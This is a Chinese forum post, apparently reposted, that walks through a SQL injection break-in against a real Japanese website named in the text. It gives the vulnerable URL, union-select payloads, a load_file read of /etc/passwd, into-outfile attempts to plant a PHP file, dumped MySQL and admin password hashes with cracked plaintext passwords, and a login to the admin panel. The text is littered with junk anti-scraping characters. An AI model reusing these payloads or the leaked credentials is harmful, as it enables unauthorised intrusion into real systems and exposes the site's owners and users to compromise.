|
|
9 J+ w* R; b. C1 B& \* ~
- z7 w! i# r/ ~# g8 q
0x01. 检测 www.zuaa.jp 收集数据
: R7 a2 L5 t4 F* _+ ~$ O3 I5 j \9 \( K+ G7 d3 `0 A ]# w5 ]
' y2 a- X- r) f+ O: w) ^
whatweb/ ?7 p; W& y2 h& L! a( j
; ^& ?+ L1 a7 r, h
* W o" N+ W, ?( b% V
利用NMAP扫描* y0 j( @9 ^3 {$ y8 Y
0 J8 t+ K! A( z* i6 c7 {6 t中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
$ F! b4 T! l! h7 R# H c9 y0x02.找注入点& _- N5 k9 A$ d
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
9 b7 ?9 W; l( ?2 H4 O# f
4 c* W0 E* g. ~5 K* \! ]* u+ m. F) N& x' s* a
0x03.order by. q3 F7 E1 X7 j7 i! D
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1: }8 v& x3 M( p) i0 o+ f
' P0 S* M. x7 vorder by 28报错,order by 27正常& ~3 H9 z' s0 Q, c6 P% C7 T
+ l9 x' S% F: ?7 t3 j$ k! a! S+ W0x04. union手动查询
+ v* K2 H7 ~# j" `( Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
7 H8 g) B+ z1 |8 A添加到 27 时正常显示 + E8 h! d% t* W! f
: U, o% q6 }2 P1 s2 H- [
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
" s: g. y1 i# q7 D% q+ S0 F7 T: H+ I' @9 M1 s6 _' c
0x05. info:
" p& w8 H Y- U$ G* l; A3 E( Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 " X: j; \+ D/ k& Y7 Z7 ?
e& D0 o8 S+ d. h0 R; vuser: root@localhost
8 d+ t. h ]9 V. A2 q8 Rdatabase: openpne# z1 r- p$ R- w _' P
version: 4.1.22) s+ t( ]+ E: C2 a- W* e
os: portbld-freebsd5.4
/ J3 g! `9 f5 m0 {" @8 w1 c, o8 m2 L% w3 W
0x06. root用户+ D R |. S% R l2 J" }) N
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)4 |+ h0 ^. f1 h9 E# n% K
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ F0 V# K2 a) a6 x; M4 g3 b+ s i9 n' W2 Y, m& k/ O9 O- k7 k
通过工具转换6 W- G# C3 i- K. ]
/ k$ X7 V. w) A+ X8 G4 [5 X, ~
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持4 R6 o! y) y- x4 V+ e1 j
; N, d5 w* j$ v! H" U0x07. 利用 into outfile
9 B+ k. W8 H0 F' `% ~全部都失败
- r" N7 a: L3 w# S% a: @7 xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php! \# z* a+ q# L: ?9 j# _
5 H1 f3 z$ L9 [8 Ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php . `- r$ ^2 z% \ s4 B3 |
( D: G. a0 G; d% R/ G H8 `页面显示“MDB2 Error:syntax error”
+ U9 ~( S5 \, t# G$ n( {; b
" b; a$ W$ b4 y8 O! j7 t8 g/ i0x08. 利用 mysql 4.1
; v5 i/ s0 f. i7 m+ b猜常规表名,字段未果 工具 sqlmap* b; m7 h: f, i
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持( O, @: j: @0 z9 Y! P& o- V
( N0 Q Y. } G- G0 h( H( v. K
( u9 K) B. t2 G3 c1 S5 M8 ]. G6 E
: e X8 X4 T2 a5 u2 N( z0x09. 查找后台$ ^; ?5 z7 K6 s6 w& a. M# G
利用 现有的各种 后台工具尝试都不行
, l3 s/ c( }$ W) W) L9 i+ u! ^& g( O
0x10. MySL外联方法0 P3 s; R y6 q, T, V% x
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行) T1 v. Y" r9 i* d+ @
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user& M* n, l: m7 r" e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user( {9 G9 z7 f# x' }8 l
# w# d! l6 a, G这个可以在 www.cmd5.com 解密
3 K8 ~0 p& k; Y; m" oroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009+ m3 k2 s9 t/ q
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97" v: g+ @" ^- O0 p- a/ F: \4 @5 ^( S
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???6 a9 {* Y: g. Y# |* \ r" V
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???: Q8 A, c6 [* Z5 y
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
( x* m& g1 n. n4 y
% E' C G% s' u E2 J" b6 _' V3 z+ O$ g; R
0x11. 网站突破
8 S) P' m" Z; v7 I0 C" N, r, m发现网站的源程序 openpne, google 下载 openpne 源码
4 p( a+ A" U' w1 m) v$ q
6 g6 d Y* A) E) Y P% @
' L* ^; R1 w) ]' u% S$ B- X# f3 [0x12. 默认信息利用$ ^/ H* ^$ ?( e0 F L O
http://sns.zuaa.jp/?m=admin&a=page_login
2 I! t( }7 W. I2 }( I* g2 k- [% Y5 \: N& {5 M+ `+ q: X7 N4 b q. N
表名 (c_admin_user) ,字段名(username,password)" S6 g$ G1 M9 K E% R3 w8 X* a% y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
6 ~! l8 n- P& f+ o) [' l
% i0 Q) P( I* Z+ ~8 z解密
7 r5 ]! I: P: G( `" Lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009 K7 \. L) u9 g I# K9 k
zuaajp:c0923ec5857796a393da99905008c176, zju1897" ]$ y; o4 A$ ^7 T: a
6 I# Y6 x$ t3 O' j* E* H' N- R
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
/ h9 H4 t, N2 {7 ^ K
3 H0 P7 J: z# V% y, |0x13. 登录后台; o J5 \2 q- f3 G+ I
* c# @& ^! K C9 a0 f' }5 a$ _4 N% T9 |
$ h" d# i9 W& j4 ]. Y+ p1 p
0x14. 小结
# @" x0 m( G5 J& [利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
+ h! J- H" M- s" r3 n" R& F感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点: I1 F' T1 @6 Y
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain/ v. l5 m6 b( V4 R2 g/ x
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
' P+ }- B) |. G4 s$ h+ A/ X- _- ?; U( Y. s
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!6 O4 K# \* x* D6 s+ L
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2012-9-17 16:22:02
收藏
支持
反对
发表于 2012-9-19 08:27:03